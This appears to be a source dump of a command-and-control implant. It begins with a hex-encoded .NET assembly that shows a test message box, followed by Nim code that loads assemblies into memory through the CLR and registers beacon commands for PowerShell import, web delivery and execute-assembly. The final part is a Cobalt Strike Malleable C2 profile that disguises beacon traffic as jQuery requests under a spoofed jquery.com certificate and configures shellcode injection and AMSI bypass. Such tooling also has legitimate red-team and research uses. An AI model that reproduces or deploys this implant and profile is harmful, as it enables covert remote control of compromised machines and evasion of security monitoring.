x65,0x72,0x76,0x69,0x63,0x65,0x73,0x0,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x2e,0x43,0x6f,0x6d,0x70,0x69,0x6c,0x65,0x72,0x53,0x65,0x72,0x76,0x69,0x63,0x65,0x73,0x0,0x44,0x65,0x62,0x75,0x67,0x67,0x69,0x6e,0x67,0x4d,0x6f,0x64,0x65,0x73,0x0,0x61,0x72,0x67,0x73,0x0,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x2e,0x46,0x6f,0x72,0x6d,0x73,0x0,0x43,0x6f,0x6e,0x63,0x61,0x74,0x0,0x4f,0x62,0x6a,0x65,0x63,0x74,0x0,0x44,0x69,0x61,0x6c,0x6f,0x67,0x52,0x65,0x73,0x75,0x6c,0x74,0x0,0x53,0x68,0x6f,0x77,0x0,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x0,0x0,0x0,0x21,0x48,0x0,0x65,0x0,0x6c,0x0,0x6c,0x0,0x6f,0x0,0x20,0x0,0x66,0x0,0x72,0x0,0x6f,0x0,0x6d,0x0,0x20,0x0,0x2e,0x0,0x4e,0x0,0x45,0x0,0x54,0x0,0x21,0x0,0x0,0xd,0x48,0x0,0x65,0x0,0x6c,0x0,0x6c,0x0,0x6f,0x0,0x20,0x0,0x0,0x0,0x0,0x0,0x34,0xd9,0x6a,0x84,0x96,0x64,0xd5,0x44,0xa4,0x5c,0x2a,0x1e,0x9c,0x41,0x3e,0xc,0x0,0x4,0x20,0x1,0x1,0x8,0x3,0x20,0x0,0x1,0x5,0x20,0x1,0x1,0x11,0x11,0x4,0x20,0x1,0x1,0xe,0x4,0x20,0x1,0x1,0x2,0x4,0x7,0x2,0x2,0x2,0x5,0x0,0x1,0x11,0x49,0xe,0x5,0x0,0x2,0xe,0xe,0xe,0x8,0xb7,0x7a,0x5c,0x56,0x19,0x34,0xe0,0x89,0x5,0x0,0x1,0x1,0x1d,0xe,0x8,0x1,0x0,0x8,0x0,0x0,0x0,0x0,0x0,0x1e,0x1,0x0,0x1,0x0,0x54,0x2,0x16,0x57,0x72,0x61,0x70,0x4e,0x6f,0x6e,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x54,0x68,0x72,0x6f,0x77,0x73,0x1,0x8,0x1,0x0,0x7,0x1,0x0,0x0,0x0,0x0,0x12,0x1,0x0,0xd,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x50,0x6f,0x70,0x0,0x0,0x5,0x1,0x0,0x0,0x0,0x0,0x17,0x1,0x0,0x12,0x43,0x6f,0x70,0x79,0x72,0x69,0x67,0x68,0x74,0x20,0xc2,0xa9,0x20,0x20,0x32,0x30,0x32,0x30,0x0,0x0,0x29,0x1,0x0,0x24,0x39,0x34,0x32,0x37,0x30,0x36,0x36,0x62,0x2d,0x37,0x61,0x38,0x31,0x2d,0x34,0x62,0x63,0x39,0x2d,0x38,0x36,0x66,0x38,0x2d,0x38,0x38,0x64,0x63,0x30,0x30,0x63,0x31,0x35,0x31,0x39,0x37,0x0,0x0,0xc,0x1,0x0,0x7,0x31,0x2e,0x30,0x2e,0x30,0x2e,0x30,0x0,0x0,0x49,0x1,0x0,0x1a,0x2e,0x4e,0x45,0x54,0x46,0x72,0x61,0x6d,0x65,0x77,0x6f,0x72,0x6b,0x2c,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x3d,0x76,0x34,0x2e,0x35,0x1,0x0,0x54,0xe,0x14,0x46,0x72,0x61,0x6d,0x65,0x77,0x6f,0x72,0x6b,0x44,0x69,0x73,0x70,0x6c,0x61,0x79,0x4e,0x61,0x6d,0x65,0x12,0x2e,0x4e,0x45,0x54,0x20,0x46,0x72,0x61,0x6d,0x65,0x77,0x6f,0x72,0x6b,0x20,0x34,0x2e,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x82,0x47,0xaf,0x82,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x72,0x0,0x0,0x0,0x24,0x27,0x0,0x0,0x24,0x9,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x52,0x53,0x44,0x53,0x83,0x70,0x80,0x1c,0xa7,0x8,0x39,0x4c,0x8f,0x8d,0xda,0xc5,0x1d,0x57,0x83,0xe7,0x1,0x0,0x0,0x0,0x43,0x3a,0x5c,0x55,0x73,0x65,0x72,0x73,0x5c,0x62,0x79,0x74,0x33,0x62,0x6c,0x33,0x33,0x64,0x33,0x72,0x5c,0x73,0x6f,0x75,0x72,0x63,0x65,0x5c,0x72,0x65,0x70,0x6f,0x73,0x5c,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x50,0x6f,0x70,0x5c,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x50,0x6f,0x70,0x5c,0x6f,0x62,0x6a,0x5c,0x44,0x65,0x62,0x75,0x67,0x5c,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x50,0x6f,0x70,0x2e,0x70,0x64,0x62,0x0,0xbe,0x27,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xd8,0x27,0x0,0x0,0x0,0x20,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xca,0x27,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x5f,0x43,0x6f,0x72,0x45,0x78,0x65,0x4d,0x61,0x69,0x6e,0x0,0x6d,0x73,0x63,0x6f,0x72,0x65,0x65,0x2e,0x64,0x6c,0x6c,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0x25,0x0,0x20,0x40,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x10,0x0,0x0,0x0,0x20,0x0,0x0,0x80,0x18,0x0,0x0,0x0,0x50,0x0,0x0,0x80,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x1,0x0,0x0,0x0,0x38,0x0,0x0,0x80,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x80,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x1,0x0,0x0,0x0,0x68,0x0,0x0,0x80,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0xcc,0x3,0x0,0x0,0x90,0x40,0x0,0x0,0x3c,0x3,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x3c,0x3,0x34,0x0,0x0,0x0,0x56,0x0,0x53,0x0,0x5f,0x0,0x56,0x0,0x45,0x0,0x52,0x0,0x53,0x0,0x49,0x0,0x4f,0x0,0x4e,0x0,0x5f,0x0,0x49,0x0,0x4e,0x0,0x46,0x0,0x4f,0x0,0x0,0x0,0x0,0x0,0xbd,0x4,0xef,0xfe,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x3f,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x44,0x0,0x0,0x0,0x1,0x0,0x56,0x0,0x61,0x0,0x72,0x0,0x46,0x0,0x69,0x0,0x6c,0x0,0x65,0x0,0x49,0x0,0x6e,0x0,0x66,0x0,0x6f,0x0,0x0,0x0,0x0,0x0,0x24,0x0,0x4,0x0,0x0,0x0,0x54,0x0,0x72,0x0,0x61,0x0,0x6e,0x0,0x73,0x0,0x6c,0x0,0x61,0x0,0x74,0x0,0x69,0x0,0x6f,0x0,0x6e,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xb0,0x4,0x9c,0x2,0x0,0x0,0x1,0x0,0x53,0x0,0x74,0x0,0x72,0x0,0x69,0x0,0x6e,0x0,0x67,0x0,0x46,0x0,0x69,0x0,0x6c,0x0,0x65,0x0,0x49,0x0,0x6e,0x0,0x66,0x0,0x6f,0x0,0x0,0x0,0x78,0x2,0x0,0x0,0x1,0x0,0x30,0x0,0x30,0x0,0x30,0x0,0x30,0x0,0x30,0x0,0x34,0x0,0x62,0x0,0x30,0x0,0x0,0x0,0x1a,0x0,0x1,0x0,0x1,0x0,0x43,0x0,0x6f,0x0,0x6d,0x0,0x6d,0x0,0x65,0x0,0x6e,0x0,0x74,0x0,0x73,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x22,0x0,0x1,0x0,0x1,0x0,0x43,0x0,0x6f,0x0,0x6d,0x0,0x70,0x0,0x61,0x0,0x6e,0x0,0x79,0x0,0x4e,0x0,0x61,0x0,0x6d,0x0,0x65,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x44,0x0,0xe,0x0,0x1,0x0,0x46,0x0,0x69,0x0,0x6c,0x0,0x65,0x0,0x44,0x0,0x65,0x0,0x73,0x0,0x63,0x0,0x72,0x0,0x69,0x0,0x70,0x0,0x74,0x0,0x69,0x0,0x6f,0x0,0x6e,0x0,0x0,0x0,0x0,0x0,0x4d,0x0,0x65,0x0,0x73,0x0,0x73,0x0,0x61,0x0,0x67,0x0,0x65,0x0,0x42,0x0,0x6f,0x0,0x78,0x0,0x50,0x0,0x6f,0x0,0x70,0x0,0x0,0x0,0x30,0x0,0x8,0x0,0x1,0x0,0x46,0x0,0x69,0x0,0x6c,0x0,0x65,0x0,0x56,0x0,0x65,0x0,0x72,0x0,0x73,0x0,0x69,0x0,0x6f,0x0,0x6e,0x0,0x0,0x0,0x0,0x0,0x31,0x0,0x2e,0x0,0x30,0x0,0x2e,0x0,0x30,0x0,0x2e,0x0,0x30,0x0,0x0,0x0,0x44,0x0,0x12,0x0,0x1,0x0,0x49,0x0,0x6e,0x0,0x74,0x0,0x65,0x0,0x72,0x0,0x6e,0x0,0x61,0x0,0x6c,0x0,0x4e,0x0,0x61,0x0,0x6d,0x0,0x65,0x0,0x0,0x0,0x4d,0x0,0x65,0x0,0x73,0x0,0x73,0x0,0x61,0x0,0x67,0x0,0x65,0x0,0x42,0x0,0x6f,0x0,0x78,0x0,0x50,0x0,0x6f,0x0,0x70,0x0,0x2e,0x0,0x65,0x0,0x78,0x0,0x65,0x0,0x0,0x0,0x48,0x0,0x12,0x0,0x1,0x0,0x4c,0x0,0x65,0x0,0x67,0x0,0x61,0x0,0x6c,0x0,0x43,0x0,0x6f,0x0,0x70,0x0,0x79,0x0,0x72,0x0,0x69,0x0,0x67,0x0,0x68,0x0,0x74,0x0,0x0,0x0,0x43,0x0,0x6f,0x0,0x70,0x0,0x79,0x0,0x72,0x0,0x69,0x0,0x67,0x0,0x68,0x0,0x74,0x0,0x20,0x0,0xa9,0x0,0x20,0x0,0x20,0x0,0x32,0x0,0x30,0x0,0x32,0x0,0x30,0x0,0x0,0x0,0x2a,0x0,0x1,0x0,0x1,0x0,0x4c,0x0,0x65,0x0,0x67,0x0,0x61,0x0,0x6c,0x0,0x54,0x0,0x72,0x0,0x61,0x0,0x64,0x0,0x65,0x0,0x6d,0x0,0x61,0x0,0x72,0x0,0x6b,0x0,0x73,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x12,0x0,0x1,0x0,0x4f,0x0,0x72,0x0,0x69,0x0,0x67,0x0,0x69,0x0,0x6e,0x0,0x61,0x0,0x6c,0x0,0x46,0x0,0x69,0x0,0x6c,0x0,0x65,0x0,0x6e,0x0,0x61,0x0,0x6d,0x0,0x65,0x0,0x0,0x0,0x4d,0x0,0x65,0x0,0x73,0x0,0x73,0x0,0x61,0x0,0x67,0x0,0x65,0x0,0x42,0x0,0x6f,0x0,0x78,0x0,0x50,0x0,0x6f,0x0,0x70,0x0,0x2e,0x0,0x65,0x0,0x78,0x0,0x65,0x0,0x0,0x0,0x3c,0x0,0xe,0x0,0x1,0x0,0x50,0x0,0x72,0x0,0x6f,0x0,0x64,0x0,0x75,0x0,0x63,0x0,0x74,0x0,0x4e,0x0,0x61,0x0,0x6d,0x0,0x65,0x0,0x0,0x0,0x0,0x0,0x4d,0x0,0x65,0x0,0x73,0x0,0x73,0x0,0x61,0x0,0x67,0x0,0x65,0x0,0x42,0x0,0x6f,0x0,0x78,0x0,0x50,0x0,0x6f,0x0,0x70,0x0,0x0,0x0,0x34,0x0,0x8,0x0,0x1,0x0,0x50,0x0,0x72,0x0,0x6f,0x0,0x64,0x0,0x75,0x0,0x63,0x0,0x74,0x0,0x56,0x0,0x65,0x0,0x72,0x0,0x73,0x0,0x69,0x0,0x6f,0x0,0x6e,0x0,0x0,0x0,0x31,0x0,0x2e,0x0,0x30,0x0,0x2e,0x0,0x30,0x0,0x2e,0x0,0x30,0x0,0x0,0x0,0x38,0x0,0x8,0x0,0x1,0x0,0x41,0x0,0x73,0x0,0x73,0x0,0x65,0x0,0x6d,0x0,0x62,0x0,0x6c,0x0,0x79,0x0,0x20,0x0,0x56,0x0,0x65,0x0,0x72,0x0,0x73,0x0,0x69,0x0,0x6f,0x0,0x6e,0x0,0x0,0x0,0x31,0x0,0x2e,0x0,0x30,0x0,0x2e,0x0,0x30,0x0,0x2e,0x0,0x30,0x0,0x0,0x0,0xdc,0x43,0x0,0x0,0xea,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xef,0xbb,0xbf,0x3c,0x3f,0x78,0x6d,0x6c,0x20,0x76,0x65,0x72,0x73,0x69,0x6f,0x6e,0x3d,0x22,0x31,0x2e,0x30,0x22,0x20,0x65,0x6e,0x63,0x6f,0x64,0x69,0x6e,0x67,0x3d,0x22,0x55,0x54,0x46,0x2d,0x38,0x22,0x20,0x73,0x74,0x61,0x6e,0x64,0x61,0x6c,0x6f,0x6e,0x65,0x3d,0x22,0x79,0x65,0x73,0x22,0x3f,0x3e,0xd,0xa,0xd,0xa,0x3c,0x61,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x20,0x78,0x6d,0x6c,0x6e,0x73,0x3d,0x22,0x75,0x72,0x6e,0x3a,0x73,0x63,0x68,0x65,0x6d,0x61,0x73,0x2d,0x6d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x63,0x6f,0x6d,0x3a,0x61,0x73,0x6d,0x2e,0x76,0x31,0x22,0x20,0x6d,0x61,0x6e,0x69,0x66,0x65,0x73,0x74,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x3d,0x22,0x31,0x2e,0x30,0x22,0x3e,0xd,0xa,0x20,0x20,0x3c,0x61,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x49,0x64,0x65,0x6e,0x74,0x69,0x74,0x79,0x20,0x76,0x65,0x72,0x73,0x69,0x6f,0x6e,0x3d,0x22,0x31,0x2e,0x30,0x2e,0x30,0x2e,0x30,0x22,0x20,0x6e,0x61,0x6d,0x65,0x3d,0x22,0x4d,0x79,0x41,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x61,0x70,0x70,0x22,0x2f,0x3e,0xd,0xa,0x20,0x20,0x3c,0x74,0x72,0x75,0x73,0x74,0x49,0x6e,0x66,0x6f,0x20,0x78,0x6d,0x6c,0x6e,0x73,0x3d,0x22,0x75,0x72,0x6e,0x3a,0x73,0x63,0x68,0x65,0x6d,0x61,0x73,0x2d,0x6d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x63,0x6f,0x6d,0x3a,0x61,0x73,0x6d,0x2e,0x76,0x32,0x22,0x3e,0xd,0xa,0x20,0x20,0x20,0x20,0x3c,0x73,0x65,0x63,0x75,0x72,0x69,0x74,0x79,0x3e,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x3c,0x72,0x65,0x71,0x75,0x65,0x73,0x74,0x65,0x64,0x50,0x72,0x69,0x76,0x69,0x6c,0x65,0x67,0x65,0x73,0x20,0x78,0x6d,0x6c,0x6e,0x73,0x3d,0x22,0x75,0x72,0x6e,0x3a,0x73,0x63,0x68,0x65,0x6d,0x61,0x73,0x2d,0x6d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x63,0x6f,0x6d,0x3a,0x61,0x73,0x6d,0x2e,0x76,0x33,0x22,0x3e,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x3c,0x72,0x65,0x71,0x75,0x65,0x73,0x74,0x65,0x64,0x45,0x78,0x65,0x63,0x75,0x74,0x69,0x6f,0x6e,0x4c,0x65,0x76,0x65,0x6c,0x20,0x6c,0x65,0x76,0x65,0x6c,0x3d,0x22,0x61,0x73,0x49,0x6e,0x76,0x6f,0x6b,0x65,0x72,0x22,0x20,0x75,0x69,0x41,0x63,0x63,0x65,0x73,0x73,0x3d,0x22,0x66,0x61,0x6c,0x73,0x65,0x22,0x2f,0x3e,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x3c,0x2f,0x72,0x65,0x71,0x75,0x65,0x73,0x74,0x65,0x64,0x50,0x72,0x69,0x76,0x69,0x6c,0x65,0x67,0x65,0x73,0x3e,0xd,0xa,0x20,0x20,0x20,0x20,0x3c,0x2f,0x73,0x65,0x63,0x75,0x72,0x69,0x74,0x79,0x3e,0xd,0xa,0x20,0x20,0x3c,0x2f,0x74,0x72,0x75,0x73,0x74,0x49,0x6e,0x66,0x6f,0x3e,0xd,0xa,0x3c,0x2f,0x61,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x3e,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x20,0x0,0x0,0xc,0x0,0x0,0x0,0xec,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0]
31 |     var assembly = load(asm_buf)
32 |     # var arr = toCLRVariant(asm_args, VT_BSTR)
33 |     var arr = toCLRVariant([""], VT_BSTR)
34 |     assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
35 |     # It is possible to get the output. 
36 |     # See RedirectStdoutStderr() from https://github.com/Ne0nd0g/go-clr 
37 | 
38 | # https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/execute_assembly_bin.nim
39 | proc exec_assembly(buf: var seq[byte], cmd: command_type) = 
40 |     var callback: callback_type
41 |     var sleep_time: int16 = 0
42 |     var offset: int32 = 0
43 |     
44 |     var temp2: array[2, byte]
45 |     var temp4: array[4, byte]
46 |     for i in 0..<2: temp2[i] = buf[i]
47 |     bigEndian32(callback.addr, temp2.addr)
48 |     buf.delete(0..<2)
49 | 
50 |     for i in 0..<2: temp2[i] = buf[i]
51 |     bigEndian16(sleep_time.addr, temp2.addr)
52 |     buf.delete(0..<2)
53 | 
54 |     for i in 0..<4: temp4[i] = buf[i]
55 |     bigEndian32(offset.addr, temp4.addr)
56 |     buf.delete(0..<4)
57 | 
58 |     var args = parse_multiple(buf, 2)
59 |     var description = args[0].toString
60 |     var assembly = args[1]
61 |     var dll = buf
62 | 
63 |     var asm_buf = parse_once(assembly)
64 |     var asm_args = buf.toString.split(" ")
65 |     exec_asm_cs(asm_buf, asm_args)
66 | 
67 | register_command(CMD_TYPE_IMPORT_PS, powershell_module)
68 | register_command(CMD_TYPE_WEB_DELIVERY, web_delivery)
69 | register_command(CMD_TYPE_EXEC_ASM_TOKEN_X86, exec_assembly)
70 | register_command(CMD_TYPE_EXEC_ASM_TOKEN_X64, exec_assembly)
71 | register_command(CMD_TYPE_EXEC_ASM_IGNORE_TOKEN_X86, exec_assembly)
72 | register_command(CMD_TYPE_EXEC_ASM_IGNORE_TOKEN_X64, exec_assembly)
73 | 


--------------------------------------------------------------------------------
/jquery.profile:
--------------------------------------------------------------------------------
  1 | # Malleable C2 Profile
  2 | # Version: CobaltStrike 4.0
  3 | # File: jquery-c2.4.0.profile
  4 | # Description: 
  5 | #    c2 profile attempting to mimic a jquery.js request
  6 | #    uses signed certificates
  7 | #    or self-signed certificates
  8 | # Authors: @joevest, @andrewchiles, @001SPARTaN 
  9 | 
 10 | ################################################
 11 | ## Tips for Profile Parameter Values
 12 | ################################################
 13 | 
 14 | ## Parameter Values
 15 | ## Enclose parameter in Double quote, not single
 16 | ##      set useragent "SOME AGENT";   GOOD
 17 | ##      set useragent 'SOME AGENT';   BAD
 18 | 
 19 | ## Some special characters do not need escaping 
 20 | ##      prepend "!@#$%^&*()";
 21 | 
 22 | ## Semicolons are ok
 23 | ##      prepend "This is an example;";
 24 | 
 25 | ## Escape Double quotes
 26 | ##      append "here is \"some\" stuff";
 27 | 
 28 | ## Escape Backslashes 
 29 | ##      append "more \\ stuff";
 30 | 
 31 | ## HTTP Values
 32 | ## Program .http-post.client must have a compiled size less than 252 bytes.
 33 | 
 34 | ################################################
 35 | ## Profile Name
 36 | ################################################
 37 | ## Description:
 38 | ##    The name of this profile (used in the Indicators of Compromise report)
 39 | ## Defaults:
 40 | ##    sample_name: My Profile
 41 | ## Guidelines:
 42 | ##    - Choose a name that you want in a report
 43 | set sample_name "jQuery CS 4.0 Profile";
 44 | 
 45 | ################################################
 46 | ## Sleep Times
 47 | ################################################
 48 | ## Description:
 49 | ##    Timing between beacon check in
 50 | ## Defaults:
 51 | ##    sleeptime: 60000
 52 | ##    jitter: 0
 53 | ## Guidelines:
 54 | ##    - Beacon Timing in milliseconds (1000 = 1 sec)
 55 | set sleeptime "30000";         # 45 Seconds
 56 | #set sleeptime "300000";       # 5 Minutes
 57 | #set sleeptime "600000";      # 10 Minutes
 58 | #set sleeptime "900000";      # 15 Minutes
 59 | #set sleeptime "1200000";      # 20 Minutes
 60 | #set sleeptime "1800000";      # 30 Minutes
 61 | #set sleeptime "3600000";      # 1 Hours
 62 | set jitter    "37";            # % jitter
 63 | 
 64 | ################################################
 65 | ## User-Agent
 66 | ################################################
 67 | ## Description:
 68 | ##    User-Agent string used in HTTP requests
 69 | ## Defaults:
 70 | ##    useragent: Internet Explorer (Random)
 71 | ## Guidelines
 72 | ##    - Use a User-Agent values that fits with your engagement
 73 | ##    - useragent can only be 128 chars
 74 | ## IE 10
 75 | # set useragent "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)";
 76 | ## MS IE 11 User Agent
 77 | set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";
 78 | 
 79 | ################################################
 80 | ## SSL CERTIFICATE
 81 | ################################################
 82 | ## Description:
 83 | ##    Signed or self-signed TLS/SSL Certifcate used for C2 communication using an HTTPS listener
 84 | ## Defaults:
 85 | ##    All certificate values are blank
 86 | ## Guidelines:
 87 | ##    - Best Option - Use a certifcate signed by a trusted certificate authority
 88 | ##    - Ok Option - Create your own self signed certificate
 89 | ##    - Option - Set self-signed certificate values
 90 | https-certificate {
 91 |     
 92 |     ## Option 1) Trusted and Signed Certificate
 93 |     ## Use keytool to create a Java Keystore file. 
 94 |     ## Refer to https://www.cobaltstrike.com/help-malleable-c2#validssl
 95 |     ## or https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh
 96 |    
 97 |     ## Option 2) Create your own Self-Signed Certificate
 98 |     ## Use keytool to import your own self signed certificates
 99 | 
100 |     #set keystore "/root/tools/CobaltStrike_V4.0/cobaltstrike.store";
101 |     #set password "s0m3th1ng3ls3";
102 | 
103 |     ## Option 3) Cobalt Strike Self-Signed Certificate
104 |     set C   "US";
105 |     set CN  "jquery.com";
106 |     set O   "jQuery";
107 |     set OU  "Certificate Authority";
108 |     set validity "365";
109 | }
110 | 
111 | ################################################
112 | ## Post Exploitations
113 | ################################################
114 | ## Description:
115 | ##    Controls post-exploitation jobs, including default x86/x64 program to open and inject shellcode into, AMSI bypass for execute-assembly, powerpick, and psinject
116 | ## Defaults:
117 | ##    spawnto_x86: 	%windir%\\syswow64\\rundll32.exe
118 | ##    spawnto_x64: 	%windir%\\sysnative\\rundll32.exe
119 | ##    obfuscate:    false
120 | ##    smartinject:  false
121 | ##    amsi_disable: false
122 | ## Guidelines
123 | ##    - spawnto can only be 63 chars
124 | ##    - OPSEC WARNING!!!! The spawnto in this example will contain identifiable command line strings
125 | ##      - sysnative for x64 and syswow64 for x86
126 | ##      - Example x64 : C:\\Windows\\sysnative\\w32tm.exe
127 | ##        Example x86 : C:\\Windows\\syswow64\\w32tm.exe
128 | ##    - The binary doesnt do anything wierd (protected binary, etc)
129 | ##    - !! Don't use these !! 
